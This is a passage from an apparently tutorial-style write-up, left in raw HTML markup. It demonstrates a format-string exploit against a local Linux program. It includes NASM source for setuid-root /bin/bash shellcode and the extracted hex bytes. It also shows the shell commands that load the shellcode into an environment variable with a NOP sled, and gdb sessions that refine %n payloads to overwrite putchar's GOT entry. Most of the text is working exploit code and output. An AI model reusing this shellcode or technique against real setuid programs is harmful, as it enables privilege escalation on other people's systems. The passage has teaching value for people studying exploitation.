class="go"DYNAMIC RELOCATION RECORDS/span/span span class="code-line"span class="go"OFFSET TYPE VALUE/span/span span class="code-line"span class="go"08049a1c R_386_GLOB_DAT __gmon_start__/span/span span class="code-line"span class="go"08049a2c R_386_JUMP_SLOT strcmp/span/span span class="code-line"span class="go"08049a30 R_386_JUMP_SLOT printf/span/span span class="code-line"span class="go"08049a34 R_386_JUMP_SLOT fclose/span/span span class="code-line"span class="go"08049a38 R_386_JUMP_SLOT _IO_getc/span/span span class="code-line"span class="go"08049a3c R_386_JUMP_SLOT puts/span/span span class="code-line"span class="go"08049a40 R_386_JUMP_SLOT __gmon_start__/span/span span class="code-line"span class="go"08049a44 R_386_JUMP_SLOT exit/span/span span class="code-line"span class="go"08049a48 R_386_JUMP_SLOT strlen/span/span span class="code-line"span class="go"08049a4c R_386_JUMP_SLOT __libc_start_main/span/span span class="code-line"span class="go"08049a50 R_386_JUMP_SLOT fopen/span/span span class="code-line"span class="go"08049a54 R_386_JUMP_SLOT putchar/span/span span class="code-line"span class="go"08049a58 R_386_JUMP_SLOT strncpy/span/span span class="code-line"/code/pre/div /td/tr/table pLine 18 is where our pointer to putchar is, it shows us that the pointer is at 08049a54 so this is the address that we need to write to./p pNext to find what address we want to write (the address of our shellcode so when putchar is called, our shellcode is run), we'll use the same method as in the last demonstration, we'll stick our shellcode in an environment variable and use getenv to figure out where it'll be in memory, we're also using the same shellcode as in part 1:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="c1"; run /bin/bash/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"global/spanspan class="w" /spanspan class="nv"_start/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"section/spanspan class="w" /spanspan class="nv".text/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"jmp/spanspan class="w" /spanspan class="nv"short/spanspan class="w" /spanspan class="nv"Call_shellcode/spanspan class="w" /spanspan class="c1"; jump to where our string is/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"shellcode:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"eax/spanspan class="w" /spanspan class="c1"; zero out eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x17/spanspan class="w" /spanspan class="c1"; put 23 into eax to setuid/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ebx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; zero out ebx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; make the syscall setuid/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; zero out eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"pop/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; pop the address of our string into ebx/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; which is the first argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"9/spanspan class="p"],/spanspan class="w" /spanspan class="nb"al/spanspan class="w" /spanspan class="c1"; put a 0 where the A is to null/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; terminate the /bin/bash string/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0xb/spanspan class="w" /spanspan class="c1"; put the sys call number 11 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"10/spanspan class="p"],/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; put a pointer to the beginning/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; of the string where the BBBB is/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; zero out the ecx register/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"14/spanspan class="p"],/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; replace the CCCC with 0000/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"lea/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"10/spanspan class="p"]/spanspan class="w" /spanspan class="c1"; load the address that used to/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; point to BBBB into ecx the second/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"lea/spanspan class="w" /spanspan class="nb"edx/spanspan class="p",/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"14/spanspan class="p"]/spanspan class="w" /spanspan class="c1"; load the address that used to/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; point to CCCC into edx the third/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"Call_shellcode:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"call/spanspan class="w" /spanspan class="nv"shellcode/spanspan class="w" /spanspan class="c1"; call the start of the actual application/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"shell:/spanspan class="w" /spanspan class="kd"db/spanspan class="w" /spanspan class="s"quot;/bin/bashABBBBCCCCquot;/spanspan class="w" /spanspan class="c1"; our string of/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; arguments to execve/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pNow we need to assemble, link, extract our shellcode then put it into an environment varable:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spannasm -f elf32 -o shell2.o shell2.nasm/span span class="code-line"span class="gp"testuser@dev:~$ /spanld -o shell2 shell2.o/span span class="code-line"span class="gp"testuser@dev:~$ /spanobjdump -d ./shell2span class="p"|/spangrep span class="s1"#39;[0-9a-f]:#39;/spanspan class="p"|/spangrep -v span class="s1"#39;file#39;/spanspan class="p"|/spancut -f2 -d:span class="p"|/spancut -f1-6 -dspan class="s1"#39; #39;/spanspan class="p"|/spantr -s span class="s1"#39; #39;/spanspan class="p"|/spantr span class="s1"#39;\t#39;/span span class="s1"#39; #39;/spanspan class="p"|/spansed span class="s1"#39;s/ $//g#39;/spanspan class="p"|/spansed span class="s1"#39;s/ /\\x/g#39;/spanspan class="p"|/spanpaste -d span class="s1"#39;#39;/span -s span class="p"|/spansed span class="s1"#39;s/^/quot;/#39;/spanspan class="p"|/spansed span class="s1"#39;s/$/quot;/g#39;/span/span span class="code-line"span class="go"quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;/span/span span class="code-line"span class="gp"testuser@dev:~$ /spanspan class="nb"export/span span class="nv"SHELLCODE/spanspan class="o"=/spanspan class="k"$(/spanpython -c span class="s1"#39;print quot;\x90quot; * 500 + quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;#39;/spanspan class="k")/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./getenvaddr SHELLCODE ./app/span span class="code-line"span class="go"SHELLCODE will be at 0xbffff76d/span/span span class="code-line"/code/pre/div /td/tr/table pSo we have our address to write to '08049a54' and the address we want to write '0xbffff76d'./p pThe address we want to write is a very big number, this is why we need to control 2 addresses, we split the number in half, first we'll figure out how to write 'f76d', and then 'bfff'. So 'f76d' in decimal is '63341', so we'll minus 11 (the number of characters printer so far) and try to pad the rest, we'll use gdb to see what number we're trying to write:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@kali:~$ /span./app span class="s2"quot;AAAABBBB : %63330u%124\$x : %125\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBB :/span/span span class="code-line"span class="go"322122294841414100 : 42424241/span/span span class="code-line"span class="gp"testuser@kali:~$ /span./app span class="s2"quot;AAAABBBBC : %63330u%124\$x : %125\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBBC :/span/span span class="code-line"span class="go"322122294841414141 : 42424242/span/span span class="code-line"span class="gp"testuser@kali:~$ /spangdb -q ./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;AAAABBBBC : %63330u%124\$n : %125\$xquot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;AAAABBBBC : %63330u%124\$n : %125\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBBC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"1/span span class="o"=/span 0xf76e/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;AAAABBBBC : %63329u%124\$n : %125\$xquot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;AAAABBBBC : %63329u%124\$n : %125\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBBC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"2/span span class="o"=/span 0xf76d/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $eax/span/span span class="code-line"span class="gp"$/spanspan class="nv"3/span span class="o"=/span 0x612f7265/span span class="code-line"/code/pre/div /td/tr/table pSo we have the right number for the bottom half now, we need to figure out the last bit, the problem here is in gdb the memory layout is slightly different, as you can see its not trying to write to 41414141, firstly we need to put the actual memory addresses we want in there and fix this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;C : %63329u%124\$x : %125\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;C : %63329u%124\$x : %125\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V��C :/span/span span class="code-line"span class="go"3221222900612f7265 : 54007070/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CC : %63329u%124\$x : %125\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CC : %63329u%124\$x : %125\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V��CC : /span/span span class="code-line"span class="go"322122290070612f72 : 9a540070/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%124\$x : %125\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%124\$x : %125\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V��CCCC :/span/span span class="code-line"span class="go"3221222900707061 : 8049a54/span/span span class="code-line"span class="go"[Inferior 1 (process 31783) exited with code 01]/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$x : %126\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$x : %126\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V��CCCC :/span/span span class="code-line"span class="go"32212229008049a54 : 80049a56/span/span span class="code-line"span class="go"[Inferior 1 (process 31789) exited with code 01]/span/span span class="code-line"/code/pre/div /td/tr/table pOk we we have our pointers aligned again, I've set the second address to code\x56\x9a\x04\x80/code (or code80049a56/code) because we want an error to occur so we can see what values we are trying to write, this will ultimately be code08049a56/code which is 2 bytes different from the address we found in the GOT (code08049a54/code) (meaning this will be the second half of the memory address)./p pLet's get onto writing that last bit:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$n : %126\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$n : %126\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V��CCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"4/span span class="o"=/span 0xf773/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $eax/span/span span class="code-line"span class="gp"$/spanspan class="nv"5/span span class="o"=/span 0x80049a56/span span class="code-line"/code/pre/div /td/tr/table pSo this is now writing to our 2nd address. We want bfff to be written there, currently 'f773' is being written there, which is higher than bfff, so we do the calculation 1bfff - f773 = c88c or 51340 in decimal, let's try:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$n : %51340u%126\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$n : %51340u%126\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V��CCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"6/span span class="o"=/span 0xf770/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print/x $eax/span/span span class="code-line"span class="gp"$/spanspan class="nv"7/span span class="o"=/span 0x72657375/span span class="code-line"/code/pre/div /td/tr/table pWe seem to have lost our position again, we will have to align the addresses again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$x : %51340u%126\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$x : %51340u%126\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V��CCCC :/span/span span class="code-line"span class="go"32212228967070612f/span/span span class="code-line"span class="go"[Inferior 1 (process 914) exited with code 01]/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$x : %51340u%127\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCC : %63329u%125\$x : %51340u%127\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V��CCCC :/span/span span class="code-line"span class="go"322122289649a5400/span/span span class="code-line"span class="go"[Inferior 1 (process 920) exited with code 01]/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63329u%125\$x : %51340u%127\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x04\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63329u%125\$x : %51340u%127\$x\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V��CCCCC :/span/span span class="code-line"span class="go"32212228968049a54/span/span span class="code-line"span class="go"[Inferior 1 (process 924) exited with code 01]/span/span span class="code-line"/code/pre/div /td/tr/table pWe've found the right place, now to make sure we are writing the right values:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x40\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63329u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x40\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63329u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V��CCCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print /x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"8/span span class="o"=/span 0xf771/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r quot;$(python -c quot;print \quot;\x54\x9a\x40\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"/span span class="code-line"span class="go"Starting program: /home/testuser/app quot;$(python -c quot;print \quot;\x54\x9a\x40\x08\x56\x9a\x04\x80\quot; + \quot;CCCCC : %63325u%127\$n : %51340u%128\$n\quot;quot;)quot;/span/span span class="code-line"span class="go"Wrong password: T�V��CCCCC :/span/span span class="code-line"span class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0xb7ea19d4 in vfprintf () from /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/i $eip/span/span span class="code-line"span class="go"=gt; 0xb7ea19d4 lt;vfprintf+16244gt;: mov %edx,(%eax)/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print /x $edx/span/span span class="code-line"span class="gp"$/spanspan class="nv"9/span span class="o"=/span 0xf76d/span span class="code-line"/code/pre/div /td/tr/table 